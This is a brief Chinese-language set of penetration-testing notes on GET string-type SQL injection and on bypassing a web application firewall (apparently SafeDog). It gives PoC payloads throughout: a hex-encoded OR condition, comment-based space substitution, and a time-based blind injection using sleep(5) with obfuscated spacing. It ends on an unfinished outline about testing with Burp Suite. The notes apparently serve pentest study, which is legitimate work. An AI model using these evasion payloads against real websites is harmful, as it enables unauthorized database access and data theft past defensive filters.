1.GET字符型注入
1.1.HEX编码
1.1.1.编码or后面的数据实现绕过
PoC:viwfwerncffe'+or+0x3a!=1--+【绕狗成功】
0x3a表示“:”
1.2.空格替换
正常在BP中修改数据包时,空格一般使用+来代替。但是这也容易被WAF拦截,使用其他的语句代替+,可以有效避免,例如:/*//--//*/
1.3.实战整体绕过思路
1.3.1.结论
PoC:vince'+and+if///_///(1=1,sleep///__///(5),1)--+
1.3.2.渗透测思路
BP抓包进行一些简单的基础测试判断是否存在SQL注入
加了一个单引号